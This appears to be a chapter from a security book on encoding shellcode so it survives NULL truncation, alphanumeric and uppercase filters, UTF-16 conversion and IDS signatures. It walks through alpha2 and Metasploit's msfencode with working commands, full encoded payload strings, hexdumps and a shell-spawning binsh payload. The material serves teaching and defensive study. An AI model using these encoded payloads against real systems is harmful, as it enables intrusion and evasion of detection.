Injected shellcode doesn't always make it into memory untouched. On its way, it can pass through functions that reject or alter the payload. For example, str*() functions truncate the payload at the first NULL character. Some functions sanitize their input, for instance by checking that all characters are alphanumeric. Others transform it (e.g., into uppercase). And last but not least, classic payloads may be detected by an IDS.
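The three filters just described can be modeled in a few lines of Python. This sketch makes three assumptions: a str*() copy stops at the first NULL, an alphanumeric check accepts only [0-9A-Za-z], and the uppercasing filter behaves like ASCII toupper(). The sample is the first 16 bytes of hello.egg, taken from its hexdump in this section. The helper names are hypothetical.

```python
import string

# First 16 bytes of hello.egg (from the hexdump of hello.egg in this section).
HELLO_PREFIX = bytes.fromhex("5589e5575653e8000000005b81c3f5ff")

# Byte values an alphanumeric filter would accept: 0-9, A-Z, a-z.
ALNUM = set((string.ascii_letters + string.digits).encode("ascii"))


def strcpy_view(payload: bytes) -> bytes:
    """What a str*() copy would keep: everything before the first NULL."""
    return payload.split(b"\x00", 1)[0]


def is_alphanumeric(payload: bytes) -> bool:
    """True if every byte is in [0-9A-Za-z]."""
    return all(b in ALNUM for b in payload)


def toupper_view(payload: bytes) -> bytes:
    """Apply ASCII toupper() to each byte, like an uppercasing filter."""
    return bytes(b - 0x20 if 0x61 <= b <= 0x7A else b for b in payload)


if __name__ == "__main__":
    kept = strcpy_view(HELLO_PREFIX)
    print(f"str*() keeps {len(kept)} of {len(HELLO_PREFIX)} bytes")
    print("alphanumeric:", is_alphanumeric(HELLO_PREFIX))
    print("unchanged by toupper:", toupper_view(HELLO_PREFIX) == HELLO_PREFIX)
```

A payload has to pass every filter that sits between the injection point and memory. The encoders discussed below each target one or more of these constraints.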
Thus, it is very desirable to control the shape of a payload. We may need to avoid forbidden characters, or to mutate the payload so that an IDS looking for known patterns does not detect it. Shellcode written by hand can be given those properties directly. It is usually more convenient, though, to write the shellcode without those constraints and change its shape afterward. A common approach is to hand-write a loader that has those properties and can decode any payload, then append the encoded shellcode to it. Many tools can automate this step.
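The loader idea can be illustrated with a deliberately simple scheme: a single-byte XOR. This is a stand-in chosen for readability, not what alpha2 or msfencode generate. In the Python sketch below, `xor_encode` plays the role of the tool and searches for a key that keeps forbidden bytes out of the encoded body. `xor_decode` mirrors what the hand-written loader would do in memory. Both names are hypothetical.

```python
def xor_encode(payload: bytes, bad: bytes) -> tuple[int, bytes]:
    """Pick a one-byte XOR key so that neither the key nor any encoded byte is in `bad`."""
    bad_set = set(bad)
    for key in range(1, 256):  # key 0 would leave the payload unchanged
        if key in bad_set:
            continue  # the loader must embed the key, so it has to be clean too
        encoded = bytes(b ^ key for b in payload)
        if bad_set.isdisjoint(encoded):
            return key, encoded
    raise ValueError("no single-byte XOR key avoids every bad character")


def xor_decode(key: int, encoded: bytes) -> bytes:
    """What the loader stub would do in memory before jumping to the payload."""
    return bytes(b ^ key for b in encoded)


if __name__ == "__main__":
    payload = bytes.fromhex("5589e5575653e8000000005b")  # start of hello.egg
    key, encoded = xor_encode(payload, bad=b"\x00")
    print(f"key=0x{key:02x} encoded={encoded.hex(' ')}")
    print("round trip ok:", xor_decode(key, encoded) == payload)
```

A real loader is x86 code placed in front of the encoded bytes. That code must itself obey the same character constraints, which is what makes writing it by hand the hard part.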
alpha2 is a shellcode encoder for x86 that can transform an arbitrary sequence of instructions into a fully alphanumeric one. It can also produce uppercase-only output, as well as shellcode that remains valid after conversion to Unicode.
One problem with alphanumeric shellcode on x86 is not entirely resolved, though. The in-place decoding technique needs to know the address at which the shellcode has been injected. A piece of code that recovers this address is classically called getPC[31] code. There is no known alphanumeric getPC code yet. One current solution uses Structured Exception Handlers (SEH) on Windows. It works well, but it is not universal. Another common solution is to provide the shellcode with its address, or with a place where that address can be found. In both cases, there is no one-size-fits-all solution.
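To see why getPC is the sticking point, we can run two classic x86 getPC idioms through an alphanumeric filter. Both byte sequences come from dumps in this section:

- the call/pop pair at offset 6 of hello.egg;
- the FPU-based fnstenv sequence that opens the shikata_ga_nai output.

The instruction names in the comments are a hand disassembly of those bytes, not tool output, and the Python below is only a sketch:

```python
import string

# Byte values an alphanumeric filter would accept: 0-9, A-Z, a-z.
ALNUM = set((string.ascii_letters + string.digits).encode("ascii"))

# call $+5 ; pop ebx  (e8 00 00 00 00 5b, at offset 6 of hello.egg)
CALL_POP = bytes.fromhex("e8000000005b")
# fcmovnb st(0),st(4) ; fnstenv [esp-0xc] ; pop eax  (start of encoded.egg)
FNSTENV_POP = bytes.fromhex("dbc4d97424f458")


def rejected_bytes(code: bytes) -> list[str]:
    """Return, as hex strings, the bytes an alphanumeric filter would reject."""
    return [f"{b:02x}" for b in code if b not in ALNUM]


if __name__ == "__main__":
    for name, code in (("call/pop", CALL_POP), ("fnstenv/pop", FNSTENV_POP)):
        print(name, "rejects:", " ".join(rejected_bytes(code)))
```

Both idioms fail on their opcodes alone. 0xE8 (call) and the FPU escape bytes 0xD8 to 0xDF lie above 0x7A, the largest alphanumeric value.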
Once we get specific about platforms and operating systems, things get a lot easier. If the target runs Windows, we can use the SEH getPC. On Unix, if we target a specific vulnerability, then we know the state of the process at the time of exploitation. Since the shellcode has been injected somewhere, there should be a place, such as a register or a memory location, where the address of this "somewhere" has been stored. That is the place we have to know before generating the shellcode.
For example, let's test the encoded shellcode with the loader presented earlier in this chapter, in the section "A Shellcode Loader." The loader calls the shellcode with this instruction:
0x080484e4 <main+240>: call *%eax
This means that when the shellcode gets called, EAX points to it. Thus, we just have to tell alpha2 to generate shellcode that uses the content of the EAX register to learn its location and decode its payload:
$ alpha2 eax < hello.egg > alpha.egg
$ chmod +x alpha.egg
$ ./alpha.egg
Hello world!
$ cat alpha.egg
PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIpUOym53gV6bskXuPgpwp7p3kk1o
3l5YoKO9oK3JLwlilnm1mHXNmoCBxuP7p5PnYuSWps0Wp8s95nm65jx1vy5K9kaMSytJPMofaC0c05P
MhfdUP5PUPLzVn30ePWpRsNikKzmmPqKoyzXv3OKtEwpUPGpXMopQKlMau8tqK1NQOkyO3CxQurLrL2
OwP1grO0rRLU4wQUZUPGzA
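A quick sanity check in Python confirms that the alpha2 output above really stays within [0-9A-Za-z]. Only the first wrapped line is copied here, and the regular expression is simply one way to express the constraint:

```python
import re

# First wrapped line of the `cat alpha.egg` output above.
ALPHA_EAX = "PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIpUOym53gV6bskXuPgpwp7p3kk1o"

# Alphanumeric means byte values 0x30 to 0x39, 0x41 to 0x5A and 0x61 to 0x7A only.
ALNUM_RE = re.compile(r"[0-9A-Za-z]*")


def is_alphanumeric(text: str) -> bool:
    return ALNUM_RE.fullmatch(text) is not None


if __name__ == "__main__":
    print("alphanumeric:", is_alphanumeric(ALPHA_EAX))
    print("byte range:", hex(min(map(ord, ALPHA_EAX))), "to", hex(max(map(ord, ALPHA_EAX))))
```

Note that this default output mixes upper- and lowercase letters.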
Obviously, if we do the same with another register, it will not work:
$ alpha2 ebx < hello.egg > alpha.egg
$ ./alpha.egg
Segmentation fault (core dumped)
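Why the wrong register breaks things can be shown with a toy Python model. The decoder computes where its encoded body lives from the base address it is handed, so a wrong base decodes whatever happens to be at that address. The nibble encoding, the 8-byte placeholder stub, the addresses and all function names are hypothetical and chosen only for illustration. alpha2's real encoding differs, and it decodes in place rather than into a separate buffer.

```python
# Toy model only: a hypothetical nibble encoding and stub size, not alpha2's real scheme.
STUB = b"PYIIIIII"  # placeholder bytes standing in for the decoder stub
STUB_LEN = len(STUB)


def encode_nibbles(payload: bytes) -> bytes:
    """Encode each byte as two letters in 'A'..'P' (high nibble, low nibble)."""
    out = bytearray()
    for b in payload:
        out.append(0x41 + (b >> 4))
        out.append(0x41 + (b & 0x0F))
    return bytes(out)


def inject(memory: bytearray, address: int, payload: bytes) -> int:
    """Copy stub + encoded payload to `address`; return the decoded length."""
    blob = STUB + encode_nibbles(payload)
    memory[address:address + len(blob)] = blob
    return len(payload)


def decode_from_register(memory: bytearray, reg_value: int, length: int) -> bytes:
    """Decode `length` bytes, trusting reg_value as the shellcode's start address."""
    start = reg_value + STUB_LEN
    out = bytearray()
    for i in range(length):
        hi = (memory[start + 2 * i] - 0x41) & 0x0F
        lo = (memory[start + 2 * i + 1] - 0x41) & 0x0F
        out.append((hi << 4) | lo)
    return bytes(out)


if __name__ == "__main__":
    memory = bytearray(256)
    payload = bytes.fromhex("5589e5575653")  # first bytes of hello.egg
    eax = 0x40  # the loader's `call *%eax`: EAX holds the shellcode address
    ebx = 0x10  # some unrelated value
    n = inject(memory, eax, payload)
    print("via EAX:", decode_from_register(memory, eax, n).hex())
    print("via EBX:", decode_from_register(memory, ebx, n).hex())
```

In the real case, the garbage produced through the wrong base is then executed, hence the segmentation fault.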
alpha2 is also able to generate shellcode with only uppercase characters. This allows it to survive any data manipulation that converts input to uppercase:
$ alpha2 --uppercase eax < hello.egg
PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIF5MYZEPWQFPSJHUPC05P
EP1KMQO3JUKOKOKOLCJL5LKLLMSM9HLM83PX5PEPUPOIC330C030JSOULMPU8XSVY5K9N1LCJDJPOOE
QUPEPS0OHS45PUPS0OJTNEPS0UPV3MYKK8MMPQKLIZXQCOKUUUP5PS0XMMPQKLMREL41KQNQOXIISW8
U5RLRLROWPRWROT2BLU4Q14JUPDJA
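To see what --uppercase buys, here is a small Python model of an uppercasing filter applied to the first line of each alpha2 output shown so far. The filter mimics C toupper() in the "C" locale, which is an assumption about the target program:

```python
# First wrapped lines of the two alpha2 outputs above (default and --uppercase).
MIXED = "PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIpUOym53gV6bskXuPgpwp7p3kk1o"
UPPER = "PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIF5MYZEPWQFPSJHUPC05P"


def toupper_filter(data: bytes) -> bytes:
    """Mimic C toupper() on each byte in the "C" locale: only a-z change."""
    return bytes(b - 0x20 if 0x61 <= b <= 0x7A else b for b in data)


def survives_toupper(data: bytes) -> bool:
    """True if the filter leaves the shellcode byte-for-byte intact."""
    return toupper_filter(data) == data


if __name__ == "__main__":
    print("mixed-case survives:", survives_toupper(MIXED.encode("ascii")))
    print("uppercase survives:", survives_toupper(UPPER.encode("ascii")))
```

Such a filter would corrupt the mixed-case output: every lowercase byte changes, e.g., 'j' (0x6A) becomes 'J' (0x4A). The uppercase output passes through unchanged.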
Many Windows programs convert their input to UTF-16. With UTF-16 in little-endian byte order, as used on x86, each ASCII character becomes that byte followed by a NULL byte. alpha2 is able to generate a string that, once passed through such an ASCII to UTF-16 transformation, becomes equivalent to the input shellcode.
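Concretely, widening ASCII to UTF-16LE interleaves a 0x00 after every character. alpha2's --unicode output is therefore designed to be valid x86 code only once those NULLs are in place. Below is a minimal Python sketch of the transformation and of the inverse check. The function names are hypothetical.

```python
def widen_ascii_to_utf16le(text: str) -> bytes:
    """ASCII to UTF-16LE, as a Windows conversion would do: 0x00 after each byte."""
    text.encode("ascii")  # raises UnicodeEncodeError if the input is not pure ASCII
    return text.encode("utf_16_le")


def narrow_utf16le_to_ascii(data: bytes) -> str:
    """Inverse check: every odd-offset byte must be 0x00; keep the even ones."""
    if len(data) % 2 or any(data[1::2]):
        raise ValueError("not an ASCII string widened to UTF-16LE")
    return data[0::2].decode("ascii")


if __name__ == "__main__":
    wide = widen_ascii_to_utf16le("PYIIII")
    print(wide.hex(" "))
    print(narrow_utf16le_to_ascii(wide))
```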
First, turn the shellcode into a string suitable for transformation:
$ ./alpha2 --nocompress --unicode eax < binsh.egg > binsh.unicode.not.egg.yet
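Then simulate what would occur during an ASCII to UTF-16 translation with this small Python 3 snippet. The utf_16_le codec produces little-endian output without a byte-order mark, so there is no 2-byte BOM to strip, and the result is written in binary mode:
>>> not_egg_yet = open("binsh.unicode.not.egg.yet", "rb").read()
>>> egg = not_egg_yet.decode("ascii").encode("utf_16_le")
>>> open("binsh.unicode.egg", "wb").write(egg)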
Finally, run it:
$ chmod +x ./binsh.unicode.egg
$ ./binsh.unicode.egg
sh-3.1$
The Metasploit Framework comes with a program called msfencode that can encode shellcode. It provides many encoding techniques suitable for most cases on x86. Support for other architectures tends to be poor, as the list of existing encoders shows:
$ ./msfencode -l

Framework Encoders
==================

Name                    Rank       Description
----                    ----       -----------
cmd/generic_sh          normal     Generic Shell Variable Substitution Command Encoder
generic/none            normal     The "none" Encoder
ppc/longxor             normal     PPC LongXOR Encoder
ppc/longxor_tag         normal     PPC LongXOR Encoder
sparc/longxor_tag       normal     SPARC DWORD XOR Encoder
x86/alpha_mixed         low        Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper         low        Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_utf8_tolower  average    Avoid UTF8/tolower
x86/call4_dword_xor     normal     Call+4 Dword XOR Encoder
x86/countdown           normal     Single-byte XOR Countdown Encoder
x86/fnstenv_mov         normal     Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive   great      Polymorphic Jump/Call XOR Additive Feedback Encoder
x86/nonalpha            low        Non-Alpha Encoder
x86/nonupper            low        Non-Upper Encoder
x86/shikata_ga_nai      excellent  Polymorphic XOR Additive Feedback Encoder
x86/unicode_mixed       low        Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper       low        Alpha2 Alphanumeric Unicode Uppercase Encoder
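When msfencode has to search for a working encoder, it tries them ordered by rank. The small Python sketch below reproduces that ordering for the x86 rows above. The numeric values mirror Metasploit's ranking constants. Breaking ties by listing order is this sketch's assumption, not necessarily what Metasploit does.

```python
# Numeric values of Metasploit's ranking constants (LowRanking = 100, etc.).
RANK_VALUE = {
    "manual": 0, "low": 100, "average": 200, "normal": 300,
    "good": 400, "great": 500, "excellent": 600,
}

# (name, rank) for the x86 rows of the `msfencode -l` listing above.
X86_ENCODERS = [
    ("x86/alpha_mixed", "low"),
    ("x86/alpha_upper", "low"),
    ("x86/avoid_utf8_tolower", "average"),
    ("x86/call4_dword_xor", "normal"),
    ("x86/countdown", "normal"),
    ("x86/fnstenv_mov", "normal"),
    ("x86/jmp_call_additive", "great"),
    ("x86/nonalpha", "low"),
    ("x86/nonupper", "low"),
    ("x86/shikata_ga_nai", "excellent"),
    ("x86/unicode_mixed", "low"),
    ("x86/unicode_upper", "low"),
]


def try_order(encoders: list[tuple[str, str]]) -> list[str]:
    """Highest rank first; ties keep listing order (sorted() is stable)."""
    ranked = sorted(encoders, key=lambda e: RANK_VALUE[e[1]], reverse=True)
    return [name for name, _ in ranked]


if __name__ == "__main__":
    for position, name in enumerate(try_order(X86_ENCODERS), start=1):
        print(position, name)
```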
Table 10-1 lists the supported options.
Table 10-1. Options for msfencode
| Option | Description |
|---|---|
| -a | The architecture to encode as. |
| -b | The list of characters to avoid. |
| -e | The encoder to use. |
| -i | Encode the contents of the supplied file path. |
| -l | List available encoders. |
| -n | Dump encoder information. |
| -s | The maximum size of the encoded data. |
| -t | The format to display the encoded buffer with (raw, ruby, perl, c). |
Let's examine msfencode, beginning with this shellcode generated by GCC:
$ ./hello.egg
Hello world!
$ hd hello.egg
00000000 55 89 e5 57 56 53 e8 00 00 00 00 5b 81 c3 f5 ff |U..WVS.....[....|
00000010 ff ff 83 ec 1c fc 8d 7d d8 8d b3 58 00 00 00 b9 |.......}...X....|
00000020 03 00 00 00 f3 a5 8d 55 d8 66 a5 89 d1 83 e4 f0 |.......U.f......|
00000030 bf 01 00 00 00 b8 04 00 00 00 ba 0e 00 00 00 53 |...............S|
00000040 89 fb cd 80 5b 89 f8 53 bb 05 00 00 00 cd 80 5b |....[..S.......[|
00000050 8d 65 f4 5b 5e 5f c9 c3 48 65 6c 6c 6f 20 77 6f |.e.[^_..Hello wo|
00000060 72 6c 64 21 0a 00 0a |rld!...|
00000067
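The NULLs in this dump can be counted precisely with a few lines of Python that rebuild hello.egg from the hexdump above. The transcription and the helper name are this sketch's own:

```python
# hello.egg, transcribed from the hexdump above (0x67 = 103 bytes).
HELLO_EGG = bytes.fromhex("""
55 89 e5 57 56 53 e8 00 00 00 00 5b 81 c3 f5 ff
ff ff 83 ec 1c fc 8d 7d d8 8d b3 58 00 00 00 b9
03 00 00 00 f3 a5 8d 55 d8 66 a5 89 d1 83 e4 f0
bf 01 00 00 00 b8 04 00 00 00 ba 0e 00 00 00 53
89 fb cd 80 5b 89 f8 53 bb 05 00 00 00 cd 80 5b
8d 65 f4 5b 5e 5f c9 c3 48 65 6c 6c 6f 20 77 6f
72 6c 64 21 0a 00 0a
""")


def null_offsets(data: bytes) -> list[int]:
    """Offsets of every 0x00 byte, each of which would stop a str*() copy."""
    return [i for i, b in enumerate(data) if b == 0x00]


if __name__ == "__main__":
    offsets = null_offsets(HELLO_EGG)
    print(len(HELLO_EGG), "bytes,", len(offsets), "NULLs")
    print("offsets:", " ".join(f"0x{o:02x}" for o in offsets))
```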
Note that there are many 0x00 characters, each of which would stop str*() functions, so injection would be only partial. We need to remove them. By default, msfencode will only encode using the shikata_ga_nai encoder (shikata ga nai is a Japanese colloquialism roughly translatable as "there is no choice" or "it can't be helped"). We have to add the constraint of avoiding 0x00 characters with the -b '\x00' option. msfencode will then try all encoders, ordered by rank, until one returns an acceptable result:
$ ./msfencode -t raw -b '\x00' < hello.egg > encoded.egg
[*] x86/shikata_ga_nai succeeded, final size 131
$ chmod +x encoded.egg
$ ./encoded.egg
Hello world!
Now we have a 131-byte shellcode equivalent to the original 103-byte shellcode, but without any NULL characters:
$ hd encoded.egg
00000000 db c4 d9 74 24 f4 58 29 c9 b1 1b bb 9d aa 66 bf |...t$.X)......f.|
00000010 31 58 17 83 e8 fc 03 c5 b9 84 4a a0 34 ad e2 1c |1X........J.4...|
00000020 14 c6 0d a0 9a 16 55 21 59 e3 96 de a1 8f 85 3c |......U!Y......<|
00000030 a2 1d 28 e4 d7 ad 8b 14 e8 d1 92 17 e8 d1 e4 e4 |..(.............|
00000040 4d 5c b1 d2 e8 fa b3 33 77 e0 34 0c 79 e9 b4 72 |M\.....3w.4.y..r|
00000050 c2 ed b4 72 32 54 ba 72 32 a8 90 fb c9 65 96 a0 |...r2T.r2....e..|
00000060 a4 8e c4 ed b2 6e eb 11 70 ee b0 9c ef 1b 1d c0 |.....n..p.......|
00000070 b0 2a 61 b4 2b c1 0a 2b 94 6e bc c1 b8 f4 63 2f |.*a.+..+.n....c/|
00000080 41 ff 63 |A.c|
00000083
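The -b constraint can be double-checked the same way. The Python sketch below rebuilds encoded.egg from the hexdump above and lists any offsets holding a forbidden byte. The helper name is hypothetical, and the same check works for a longer bad-character list:

```python
ORIGINAL_SIZE = 103  # size of hello.egg (0x67 in its hexdump)

# encoded.egg, transcribed from the hexdump above (0x83 = 131 bytes).
ENCODED_EGG = bytes.fromhex("""
db c4 d9 74 24 f4 58 29 c9 b1 1b bb 9d aa 66 bf
31 58 17 83 e8 fc 03 c5 b9 84 4a a0 34 ad e2 1c
14 c6 0d a0 9a 16 55 21 59 e3 96 de a1 8f 85 3c
a2 1d 28 e4 d7 ad 8b 14 e8 d1 92 17 e8 d1 e4 e4
4d 5c b1 d2 e8 fa b3 33 77 e0 34 0c 79 e9 b4 72
c2 ed b4 72 32 54 ba 72 32 a8 90 fb c9 65 96 a0
a4 8e c4 ed b2 6e eb 11 70 ee b0 9c ef 1b 1d c0
b0 2a 61 b4 2b c1 0a 2b 94 6e bc c1 b8 f4 63 2f
41 ff 63
""")


def violations(data: bytes, bad: bytes) -> list[int]:
    """Offsets of bytes that appear in the bad-character set."""
    return [i for i, b in enumerate(data) if b in bad]


if __name__ == "__main__":
    print("size:", len(ENCODED_EGG), "overhead:", len(ENCODED_EGG) - ORIGINAL_SIZE)
    print("NULL offsets:", violations(ENCODED_EGG, b"\x00"))
```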
msfencode also includes encoders borrowed from the alpha2 tool (the Alpha2 entries in the encoder list above), as the following example shows:
$ ./msfencode -t raw -e x86/alpha_upper < binsh.egg > binsh_alpha.egg
[*] x86/alpha_upper succeeded, final size 141
$ cat binsh_alpha.egg
PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIFQIPF0E6F0E6BHFMD0M
YJFBHFOD3CXNJK0D4GTESNJE8FOBBCYBNLIJCF0QFQCLIKQK9HBNPDKHMK0HLAA
$ chmod +x binsh_alpha.egg
$ ./binsh_alpha.egg
sh-3.1$
[31] PC means Program Counter; i.e., the register that keeps the address of the currently executed instruction. It is called EIP on x86.